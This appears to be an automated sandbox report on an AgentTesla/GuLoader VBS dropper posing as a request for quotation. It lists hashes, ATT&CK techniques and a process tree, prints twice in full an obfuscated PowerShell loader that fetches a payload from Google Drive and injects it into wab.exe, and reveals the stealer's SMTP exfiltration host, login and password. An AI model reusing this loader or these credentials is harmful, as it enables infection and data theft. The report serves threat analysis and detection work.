agenttesla | cd701adeeddc4cb8034b9b37b570fb777ef2e43919364881fea72800f8ce89c5

General

Target

RFQ20240326_Lista commerciale.vbs
Size

39KB
MD5

57677b0b418974ecaa2bbce0a1307751
SHA1

e6201e191e4b52eb11eb94436d5f2a3b156e447e
SHA256

cd701adeeddc4cb8034b9b37b570fb777ef2e43919364881fea72800f8ce89c5
SHA512

1c7b4658b1e675608c8c8e020320a55c2429506246b3e36bad54e4d88cf47c186b6e894c83bceedfb846fdd137f5405f8e9c43375beb89a61e41ed3795951a14
SSDEEP

768:u05gBt/WAZGc8NnKwiQTdQUn2DoEx2E198Dbk:S1qNnKwKUwoEx2u9l

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
[email protected]
Password:
Amir@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
[email protected]
Password:
Amir@2021
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

34 drive.google.com
35 drive.google.com
59 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

64 api.ipify.org
65 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

4340 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

5072 powershell.exe
4340 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 5072 set thread context of 4340 5072 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
34	drive.google.com
35	drive.google.com
59	drive.google.com

flow	ioc
64	api.ipify.org
65	api.ipify.org

pid	process
4340	wab.exe

pid	process
5072	powershell.exe
4340	wab.exe

description	pid	process	target process
PID 5072 set thread context of 4340	5072	powershell.exe	wab.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid	process
2052	powershell.exe
2052	powershell.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
4340	wab.exe
4340	wab.exe
4340	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

5072 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2052 powershell.exe
Token: SeDebugPrivilege 5072 powershell.exe
Token: SeDebugPrivilege 4340 wab.exe

pid	process
5072	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	4340	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2148 wrote to memory of 2052	2148	WScript.exe	powershell.exe
PID 2148 wrote to memory of 2052	2148	WScript.exe	powershell.exe
PID 2052 wrote to memory of 3808	2052	powershell.exe	cmd.exe
PID 2052 wrote to memory of 3808	2052	powershell.exe	cmd.exe
PID 2052 wrote to memory of 5072	2052	powershell.exe	powershell.exe
PID 2052 wrote to memory of 5072	2052	powershell.exe	powershell.exe
PID 2052 wrote to memory of 5072	2052	powershell.exe	powershell.exe
PID 5072 wrote to memory of 1048	5072	powershell.exe	cmd.exe
PID 5072 wrote to memory of 1048	5072	powershell.exe	cmd.exe
PID 5072 wrote to memory of 1048	5072	powershell.exe	cmd.exe
PID 5072 wrote to memory of 4340	5072	powershell.exe	wab.exe
PID 5072 wrote to memory of 4340	5072	powershell.exe	wab.exe
PID 5072 wrote to memory of 4340	5072	powershell.exe	wab.exe
PID 5072 wrote to memory of 4340	5072	powershell.exe	wab.exe
PID 5072 wrote to memory of 4340	5072	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ20240326_Lista commerciale.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spisningers Statsoverhovederne Glosebog #>;$Expensing=(cmd /c set /A 115^^0);Function Unaccompanied ([String]$Demihag){$Carbons=[char][int]$Expensing+'ubstring';$Oriya=8;$Redward160=Eddikebryggere($Demihag);For($Optimistjolle=7; $Optimistjolle -lt $Redward160; $Optimistjolle+=$Oriya){$Overweighing=$Demihag.$Carbons.Invoke($Optimistjolle, 1);$Subicterical=$Subicterical+$Overweighing;}$Subicterical;}function Eurohring ($Disaccharidase){. ($Matterate) ($Disaccharidase);}function Eddikebryggere ([String]$Yemenittisk147){$Sparrowless=$Yemenittisk147.Length-1;$Sparrowless;}$Puffier=Unaccompanied 'Ret,eskT Ijnesprsla,maralegongsnMetricas d.tterf F,ontieStichoirCosm gerPlo.ghhitrimlesn.eskyttgSc.ldud ';$Shielings=Unaccompanied 'Pungarsh Emiss.tTolvtaltHeniquepForegivsTvetung:defence/T.ystsc/NedfrysdSpejderrcannesbiGrundigvForsknie R,vnem.FlugtsigclandesoBedirtbo,elkoragflattenlD.versieHermaet. IsomercparitetoAssistfmTampedc/ OverimuSjlelivcSt mmel? Skaalpe TitlenxUbetrygp Ekvi aoFo esairAggracetMateri =VideoapdKroatspoRetma,swSupr,henTemperal.nidafaoPers,naaCalendudOuthast& Grand.iPedicurd Epa,ch=Soci.lo1.nsinueF t awlc7 Impe,iwFloscul-.smansiOSoftwarQHighbingBrugerfrThi ste0folkebeLunapperO Canc eXHomacanOtremamdH CarideyFond kofSlalomeLHa.vorsZUegennyRKaplanuuRagedesDBab lone Nobbutn.yelets8Multilak P eventDispermO,knsomss ollineTHinknin8Bro yggktrapezimLicenti ';$Matterate=Unaccompanied ' Podietichondrae SeptenxSulphos ';$Viadukterne=Unaccompanied 'surfboa$GodsibigIsol.ekl El.egnoSam.ensbDreadnaaspoon.elIdeolog:MettestHFagvideo Unliebv Ulmusee ,arsebdPerturbpHjredelr maaredaNontranenonpropdYoghurtiLaciniokMuskatsa En ghetEuropea Aeth.l=Pateria LaevolSU.dercot.ransata,ardersrHubneritUmindel-VitiablBStimulaiAllogentAbon ems SubcosTTransatrReauditaRammedenA,dingtsClonicjfMordelleFd,varerCandeli Calip.a-Korru,tS Odontoo sn,kkeuspallinr Flovsec U,casueBrahman Tarmbla$Borg.rrS O hofthTrochilihavestue HovedblAccessiiE.eclannFlamboygUnse.nts Antiox Shantym- Unr maDStilebge BotnissMelanoptOpto,leiDe.ogatn Osmos aExpansitNationaiBlastidoReolpljnNonco s Silkwor$,iliondM IodochoBugspytdDegenereHordenslredundaf ConceslHeterolyIndertrvCladekne Fr tfurPalle.neConcita ';Eurohring (Unaccompanied 'An,rend$ F,ignigTraadvrlEdikteroBefr elbJag.gevaswonkenl Gasp,s: GrithbMcrucisoo,verexcd normioeKognitilUns,ottfreproa,lMetodisy Quake.v MaterieWindowirRundspre Filig =Foregan$Crys,aleSyn.aktnPr,thalvGl tino:Tv,ngsaaJillingpImpearlpRaasilkdUnsuperaMiscon,tUn ehavaO,taget ') ;Eurohring (Unaccompanied 'AftalegIMarketimMcelroypOver ntoOvervarr.ordfylt Bedrev-LarsensMRetranqo,orebygdF.oppenuImportulcockatieRaadere GurushiBOutt rni ,arteltKyskesnsPrim,geTGennemsrDecimala Pilfern Wrong s adsprefStandkveSousaforF rnedr ') ;$Modelflyvere=$Modelflyvere+'\Folketingssamlingen.Fak' ;Eurohring (Unaccompanied 'Resedae$osteitigAsfaltblSwa.smroKharou,bT.rninga UlvesklTilsmag:De,loccRSacrifieBefing,tFlsomm rGymnorha SluffecSkovltrkFlsk gge Fli.tedStatssk= traffe( Saar,aTInklineeSingrn.sOrdrebetGlom.re- ,ewindPParisthaSkrivektGl,mmebh icenti Mani.u$Ska nskM Act nooMidinetdUneffeneAktieskl LavkonfOutrol.lJabo,icyDalrendvF.atbree Surhedr A,risteBibliol)Sla der ') ;while (-not $Retracked) {Eurohring (Unaccompanied 'OrddeltI .isrhyfScott.f Arrogat(Jechode$ ,dviklH Rdb deo U.dispvSkriveseC.lcothdLainarepLimbuverTatouuraBromyriewarringd SwoonyiEl.sorhkLithocaaGladisstFyndigh.ModehusJ S.lthooGrundflbB bliotSStandartKedelsmaDutiabitsoapsude varter bac,bre-Swains,eAramaeaq onlose Hartadd$SuffixaP enaidu.dgangsf SemidofFarragoiAtriumgevveskytrCloset.)Filnumm Inhalat{IndagatSMethanat eblinga.lumpthrHovedngtSamelyd-ElefantSPleur.bl LokalpeVizslase vinterpS ickil Resched1Cyclant}Mrtler.eSpyetsnlFromfilsHastighePhloeot{G.nhuseSDisp,ratGirandoaGrn evrrOr onnatSp.ngob- AnkuseSBr,ndstlYongundeUn chine ProadmpTarsipe Wildne1 .nfrit;N tofraESelvr suMountanrInphas oBelg,erhBoglad,rKatapuliSlagtofnRaflebggTalosea R.efolk$FawnierVFremseniTrigo iaViscerod .uftaku FotohakIvrk ttt gu.steeEgaliserTen ismnOverskre M,dtag}Quadr,n ');Eurohring (Unaccompanied 'aaben a$Cricketg Ter.yslSymbasioEmhttehbPodendea Laa.eklIllight:DiamondR ProtoneObserv.tSecurigrG undslaPuljersc Pi,kenkSpritteeA.tegnedEjbritt=Buntmag(SkypumpT Chordoe Forspis krivept Sar.ng-Skinde.PP.aderuaRaakladtKommunehCoelent Ekspo,e$ BoligbMSelverkoAnsweredBarytpaeDramsholNuncupaf Ch oril S,ifniyindesluv.zimutheBetydnirBiblicaeMedicin)Unhisto ') ;}Eurohring (Unaccompanied 'S.rikke$BeskyttgBambustl unmanforaakremb Menne.aBr,bedslgenarch:Austau,BPelletieRittesbaBimles,rGu tiers Rydde.h .ledgeiS.gregapNet,rks idrang= gozell GaulthG Nedk.meFordkketGubbesd-KabelafCForsknioBoulevanj,mtlantFouriereYndigh,nStligertEk igib hetero$PjuskenMMesogasoHarangudPaataleePaygradl UnderwfYor,towlCraftsmy,tepninvDiddeste pl,codr MaggieeOrdklve ');Eurohring (Unaccompanied 'Le.emsb$Ka.alkagGaraucol anhalooUreglembHydropaabronkitl .egeta:AngustiPUdklassaEn orcirLa,desmcDataba eNonfraglPrawninhPhytoaluToddymas BirtinoColl ctmPepshovr Matri a,redninaType esdOrnamene RegisttFyrassi Peddlin=Forsi.k Feedwat[ SilkesSMetropoy.versils FiletetOvertase KlagebmMiljakt.BrneskoCKeckl sogaleenyn Skamr vAugerereTilhngerTantristBu,krin]Nebackh: A,lian:Re.tatiF ChristrCen.raloBefolknmJernsbeBM,sdanpaAl odiasSyn efueRegning6Forstrr4Se tipaSPrinsestKonstrurSlgt kaiStetisenBortledgHyg.ome(Travela$Strud.eB E.spaneUnf.rdaa IthacerBalleprs Mallorh TabouriStrandvp Fstni.)Snepper ');Eurohring (Unaccompanied ' Bagroo$SvejsetgDelgranl AdieusoTonki rbTrouserae.erbollUnpr.gr:S.gtshoSHoffourlSmlehovuunsurreksaleppekUbundeteCot.fulrdekla enEval,ereProklam Overtas=Krimina Achr m[Akk rdeS Te,minyAnstdelsNeuradytStran fe.orfrism Eremac. FattigTRreddameCabinetxFatuoustAutovrk.Ov.rlevEUntractnSmaglshc AmituloCoolh.ud,okumeniKatarern.nwieldgSie ens]Dyrekre:Te.eosa:ValsendATomatpuSLokalisCPol.ticISengetjI S enoc.Planl.nG Efterke,alepdatSerratiS atingstLakri sr Stt.eliHejs vrnTbsreadgforetrk(M.dkmpe$Pre,oncPForskriaklu,ketrFlerfa.cUnbruteeSilkeorltrimmedhN matodu Es opns Vrelseo,tavrerm affeprLiberataTorsdagaChr.tradUn,hougeLnforsktT olsep)Biltraf ');Eurohring (Unaccompanied 'Tweezer$DissevegSluffenl.eleensoDoctoribDrvlen,aBr msell Betegn: Cert.fP likkerhPanth,lofinnybetAkson,muPl.insfrpianettiFredsbeaHemicir= Hypern$UncrystSRac,etel WeightuSkannetkToogtyvk RegnskeRadiator Housewn Parap,eDabblin.instigasAbradanu .ougheb SkrppesAnstandt .rhverr BistaniSycaminnEjerskigSlvtjss(Regelre3R,endea6lacunos0 Pseudo1 Mois,u2Forbnp 0Splendr,Paaland3Carteli0.iperis6 Skrfni2Diamant7 Tjenes)Synchro ');Eurohring $Photuria;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:3808

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Spisningers Statsoverhovederne Glosebog #>;$Expensing=(cmd /c set /A 115^^0);Function Unaccompanied ([String]$Demihag){$Carbons=[char][int]$Expensing+'ubstring';$Oriya=8;$Redward160=Eddikebryggere($Demihag);For($Optimistjolle=7; $Optimistjolle -lt $Redward160; $Optimistjolle+=$Oriya){$Overweighing=$Demihag.$Carbons.Invoke($Optimistjolle, 1);$Subicterical=$Subicterical+$Overweighing;}$Subicterical;}function Eurohring ($Disaccharidase){. ($Matterate) ($Disaccharidase);}function Eddikebryggere ([String]$Yemenittisk147){$Sparrowless=$Yemenittisk147.Length-1;$Sparrowless;}$Puffier=Unaccompanied 'Ret,eskT Ijnesprsla,maralegongsnMetricas d.tterf F,ontieStichoirCosm gerPlo.ghhitrimlesn.eskyttgSc.ldud ';$Shielings=Unaccompanied 'Pungarsh Emiss.tTolvtaltHeniquepForegivsTvetung:defence/T.ystsc/NedfrysdSpejderrcannesbiGrundigvForsknie R,vnem.FlugtsigclandesoBedirtbo,elkoragflattenlD.versieHermaet. IsomercparitetoAssistfmTampedc/ OverimuSjlelivcSt mmel? Skaalpe TitlenxUbetrygp Ekvi aoFo esairAggracetMateri =VideoapdKroatspoRetma,swSupr,henTemperal.nidafaoPers,naaCalendudOuthast& Grand.iPedicurd Epa,ch=Soci.lo1.nsinueF t awlc7 Impe,iwFloscul-.smansiOSoftwarQHighbingBrugerfrThi ste0folkebeLunapperO Canc eXHomacanOtremamdH CarideyFond kofSlalomeLHa.vorsZUegennyRKaplanuuRagedesDBab lone Nobbutn.yelets8Multilak P eventDispermO,knsomss ollineTHinknin8Bro yggktrapezimLicenti ';$Matterate=Unaccompanied ' Podietichondrae SeptenxSulphos ';$Viadukterne=Unaccompanied 'surfboa$GodsibigIsol.ekl El.egnoSam.ensbDreadnaaspoon.elIdeolog:MettestHFagvideo Unliebv Ulmusee ,arsebdPerturbpHjredelr maaredaNontranenonpropdYoghurtiLaciniokMuskatsa En ghetEuropea Aeth.l=Pateria LaevolSU.dercot.ransata,ardersrHubneritUmindel-VitiablBStimulaiAllogentAbon ems SubcosTTransatrReauditaRammedenA,dingtsClonicjfMordelleFd,varerCandeli Calip.a-Korru,tS Odontoo sn,kkeuspallinr Flovsec U,casueBrahman Tarmbla$Borg.rrS O hofthTrochilihavestue HovedblAccessiiE.eclannFlamboygUnse.nts Antiox Shantym- Unr maDStilebge BotnissMelanoptOpto,leiDe.ogatn Osmos aExpansitNationaiBlastidoReolpljnNonco s Silkwor$,iliondM IodochoBugspytdDegenereHordenslredundaf ConceslHeterolyIndertrvCladekne Fr tfurPalle.neConcita ';Eurohring (Unaccompanied 'An,rend$ F,ignigTraadvrlEdikteroBefr elbJag.gevaswonkenl Gasp,s: GrithbMcrucisoo,verexcd normioeKognitilUns,ottfreproa,lMetodisy Quake.v MaterieWindowirRundspre Filig =Foregan$Crys,aleSyn.aktnPr,thalvGl tino:Tv,ngsaaJillingpImpearlpRaasilkdUnsuperaMiscon,tUn ehavaO,taget ') ;Eurohring (Unaccompanied 'AftalegIMarketimMcelroypOver ntoOvervarr.ordfylt Bedrev-LarsensMRetranqo,orebygdF.oppenuImportulcockatieRaadere GurushiBOutt rni ,arteltKyskesnsPrim,geTGennemsrDecimala Pilfern Wrong s adsprefStandkveSousaforF rnedr ') ;$Modelflyvere=$Modelflyvere+'\Folketingssamlingen.Fak' ;Eurohring (Unaccompanied 'Resedae$osteitigAsfaltblSwa.smroKharou,bT.rninga UlvesklTilsmag:De,loccRSacrifieBefing,tFlsomm rGymnorha SluffecSkovltrkFlsk gge Fli.tedStatssk= traffe( Saar,aTInklineeSingrn.sOrdrebetGlom.re- ,ewindPParisthaSkrivektGl,mmebh icenti Mani.u$Ska nskM Act nooMidinetdUneffeneAktieskl LavkonfOutrol.lJabo,icyDalrendvF.atbree Surhedr A,risteBibliol)Sla der ') ;while (-not $Retracked) {Eurohring (Unaccompanied 'OrddeltI .isrhyfScott.f Arrogat(Jechode$ ,dviklH Rdb deo U.dispvSkriveseC.lcothdLainarepLimbuverTatouuraBromyriewarringd SwoonyiEl.sorhkLithocaaGladisstFyndigh.ModehusJ S.lthooGrundflbB bliotSStandartKedelsmaDutiabitsoapsude varter bac,bre-Swains,eAramaeaq onlose Hartadd$SuffixaP enaidu.dgangsf SemidofFarragoiAtriumgevveskytrCloset.)Filnumm Inhalat{IndagatSMethanat eblinga.lumpthrHovedngtSamelyd-ElefantSPleur.bl LokalpeVizslase vinterpS ickil Resched1Cyclant}Mrtler.eSpyetsnlFromfilsHastighePhloeot{G.nhuseSDisp,ratGirandoaGrn evrrOr onnatSp.ngob- AnkuseSBr,ndstlYongundeUn chine ProadmpTarsipe Wildne1 .nfrit;N tofraESelvr suMountanrInphas oBelg,erhBoglad,rKatapuliSlagtofnRaflebggTalosea R.efolk$FawnierVFremseniTrigo iaViscerod .uftaku FotohakIvrk ttt gu.steeEgaliserTen ismnOverskre M,dtag}Quadr,n ');Eurohring (Unaccompanied 'aaben a$Cricketg Ter.yslSymbasioEmhttehbPodendea Laa.eklIllight:DiamondR ProtoneObserv.tSecurigrG undslaPuljersc Pi,kenkSpritteeA.tegnedEjbritt=Buntmag(SkypumpT Chordoe Forspis krivept Sar.ng-Skinde.PP.aderuaRaakladtKommunehCoelent Ekspo,e$ BoligbMSelverkoAnsweredBarytpaeDramsholNuncupaf Ch oril S,ifniyindesluv.zimutheBetydnirBiblicaeMedicin)Unhisto ') ;}Eurohring (Unaccompanied 'S.rikke$BeskyttgBambustl unmanforaakremb Menne.aBr,bedslgenarch:Austau,BPelletieRittesbaBimles,rGu tiers Rydde.h .ledgeiS.gregapNet,rks idrang= gozell GaulthG Nedk.meFordkketGubbesd-KabelafCForsknioBoulevanj,mtlantFouriereYndigh,nStligertEk igib hetero$PjuskenMMesogasoHarangudPaataleePaygradl UnderwfYor,towlCraftsmy,tepninvDiddeste pl,codr MaggieeOrdklve ');Eurohring (Unaccompanied 'Le.emsb$Ka.alkagGaraucol anhalooUreglembHydropaabronkitl .egeta:AngustiPUdklassaEn orcirLa,desmcDataba eNonfraglPrawninhPhytoaluToddymas BirtinoColl ctmPepshovr Matri a,redninaType esdOrnamene RegisttFyrassi Peddlin=Forsi.k Feedwat[ SilkesSMetropoy.versils FiletetOvertase KlagebmMiljakt.BrneskoCKeckl sogaleenyn Skamr vAugerereTilhngerTantristBu,krin]Nebackh: A,lian:Re.tatiF ChristrCen.raloBefolknmJernsbeBM,sdanpaAl odiasSyn efueRegning6Forstrr4Se tipaSPrinsestKonstrurSlgt kaiStetisenBortledgHyg.ome(Travela$Strud.eB E.spaneUnf.rdaa IthacerBalleprs Mallorh TabouriStrandvp Fstni.)Snepper ');Eurohring (Unaccompanied ' Bagroo$SvejsetgDelgranl AdieusoTonki rbTrouserae.erbollUnpr.gr:S.gtshoSHoffourlSmlehovuunsurreksaleppekUbundeteCot.fulrdekla enEval,ereProklam Overtas=Krimina Achr m[Akk rdeS Te,minyAnstdelsNeuradytStran fe.orfrism Eremac. FattigTRreddameCabinetxFatuoustAutovrk.Ov.rlevEUntractnSmaglshc AmituloCoolh.ud,okumeniKatarern.nwieldgSie ens]Dyrekre:Te.eosa:ValsendATomatpuSLokalisCPol.ticISengetjI S enoc.Planl.nG Efterke,alepdatSerratiS atingstLakri sr Stt.eliHejs vrnTbsreadgforetrk(M.dkmpe$Pre,oncPForskriaklu,ketrFlerfa.cUnbruteeSilkeorltrimmedhN matodu Es opns Vrelseo,tavrerm affeprLiberataTorsdagaChr.tradUn,hougeLnforsktT olsep)Biltraf ');Eurohring (Unaccompanied 'Tweezer$DissevegSluffenl.eleensoDoctoribDrvlen,aBr msell Betegn: Cert.fP likkerhPanth,lofinnybetAkson,muPl.insfrpianettiFredsbeaHemicir= Hypern$UncrystSRac,etel WeightuSkannetkToogtyvk RegnskeRadiator Housewn Parap,eDabblin.instigasAbradanu .ougheb SkrppesAnstandt .rhverr BistaniSycaminnEjerskigSlvtjss(Regelre3R,endea6lacunos0 Pseudo1 Mois,u2Forbnp 0Splendr,Paaland3Carteli0.iperis6 Skrfni2Diamant7 Tjenes)Synchro ');Eurohring $Photuria;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:1048

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwf40hvz.hr3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2052-44-0x00007FFE67610000-0x00007FFE680D1000-memory.dmp

Filesize
10.8MB

Download
memory/2052-10-0x00007FFE67610000-0x00007FFE680D1000-memory.dmp

Filesize
10.8MB

Download
memory/2052-11-0x000002A274DA0000-0x000002A274DB0000-memory.dmp

Filesize
64KB

Download
memory/2052-12-0x000002A274DA0000-0x000002A274DB0000-memory.dmp

Filesize
64KB

Download
memory/2052-13-0x000002A274DA0000-0x000002A274DB0000-memory.dmp

Filesize
64KB

Download
memory/2052-14-0x000002A277280000-0x000002A2772A6000-memory.dmp

Filesize
152KB

Download
memory/2052-15-0x000002A277420000-0x000002A277434000-memory.dmp

Filesize
80KB

Download
memory/2052-46-0x000002A274DA0000-0x000002A274DB0000-memory.dmp

Filesize
64KB

Download
memory/2052-81-0x00007FFE67610000-0x00007FFE680D1000-memory.dmp

Filesize
10.8MB

Download
memory/2052-0-0x000002A274D40000-0x000002A274D62000-memory.dmp

Filesize
136KB

Download
memory/4340-85-0x0000000002020000-0x0000000004F89000-memory.dmp

Filesize
47.4MB

Download
memory/4340-76-0x0000000000DC0000-0x0000000000E02000-memory.dmp

Filesize
264KB

Download
memory/4340-83-0x0000000023900000-0x000000002399C000-memory.dmp

Filesize
624KB

Download
memory/4340-88-0x00000000232D0000-0x00000000232DA000-memory.dmp

Filesize
40KB

Download
memory/4340-82-0x0000000023200000-0x0000000023250000-memory.dmp

Filesize
320KB

Download
memory/4340-89-0x0000000074530000-0x0000000074CE0000-memory.dmp

Filesize
7.7MB

Download
memory/4340-78-0x0000000022D90000-0x0000000022DA0000-memory.dmp

Filesize
64KB

Download
memory/4340-87-0x00000000239A0000-0x0000000023A32000-memory.dmp

Filesize
584KB

Download
memory/4340-75-0x0000000074530000-0x0000000074CE0000-memory.dmp

Filesize
7.7MB

Download
memory/4340-73-0x0000000000DC0000-0x0000000002014000-memory.dmp

Filesize
18.3MB

Download
memory/4340-72-0x0000000000DC0000-0x0000000002014000-memory.dmp

Filesize
18.3MB

Download
memory/4340-59-0x0000000076F51000-0x0000000077071000-memory.dmp

Filesize
1.1MB

Download
memory/4340-58-0x0000000076FD8000-0x0000000076FD9000-memory.dmp

Filesize
4KB

Download
memory/4340-56-0x0000000002020000-0x0000000004F89000-memory.dmp

Filesize
47.4MB

Download
memory/4340-91-0x0000000022D90000-0x0000000022DA0000-memory.dmp

Filesize
64KB

Download
memory/5072-22-0x0000000005850000-0x00000000058B6000-memory.dmp

Filesize
408KB

Download
memory/5072-39-0x0000000007720000-0x00000000077B6000-memory.dmp

Filesize
600KB

Download
memory/5072-45-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/5072-47-0x0000000007DE0000-0x0000000007DE1000-memory.dmp

Filesize
4KB

Download
memory/5072-42-0x00000000076F0000-0x0000000007712000-memory.dmp

Filesize
136KB

Download
memory/5072-48-0x0000000008D00000-0x000000000BC69000-memory.dmp

Filesize
47.4MB

Download
memory/5072-49-0x0000000008D00000-0x000000000BC69000-memory.dmp

Filesize
47.4MB

Download
memory/5072-51-0x0000000074530000-0x0000000074CE0000-memory.dmp

Filesize
7.7MB

Download
memory/5072-52-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/5072-53-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/5072-54-0x0000000076F51000-0x0000000077071000-memory.dmp

Filesize
1.1MB

Download
memory/5072-55-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/5072-41-0x0000000008750000-0x0000000008CF4000-memory.dmp

Filesize
5.6MB

Download
memory/5072-57-0x0000000008D00000-0x000000000BC69000-memory.dmp

Filesize
47.4MB

Download
memory/5072-40-0x00000000076C0000-0x00000000076E2000-memory.dmp

Filesize
136KB

Download
memory/5072-43-0x0000000007BB0000-0x0000000007BC4000-memory.dmp

Filesize
80KB

Download
memory/5072-38-0x0000000006C90000-0x0000000006CAA000-memory.dmp

Filesize
104KB

Download
memory/5072-37-0x00000000080D0000-0x000000000874A000-memory.dmp

Filesize
6.5MB

Download
memory/5072-36-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/5072-74-0x0000000074530000-0x0000000074CE0000-memory.dmp

Filesize
7.7MB

Download
memory/5072-35-0x0000000006AC0000-0x0000000006B0C000-memory.dmp

Filesize
304KB

Download
memory/5072-77-0x0000000008D00000-0x000000000BC69000-memory.dmp

Filesize
47.4MB

Download
memory/5072-34-0x00000000066B0000-0x00000000066CE000-memory.dmp

Filesize
120KB

Download
memory/5072-30-0x0000000006080000-0x00000000063D4000-memory.dmp

Filesize
3.3MB

Download
memory/5072-23-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/5072-21-0x00000000057B0000-0x00000000057D2000-memory.dmp

Filesize
136KB

Download
memory/5072-20-0x0000000005920000-0x0000000005F48000-memory.dmp

Filesize
6.2MB

Download
memory/5072-18-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/5072-19-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/5072-17-0x0000000002D60000-0x0000000002D96000-memory.dmp

Filesize
216KB

Download
memory/5072-16-0x0000000074530000-0x0000000074CE0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads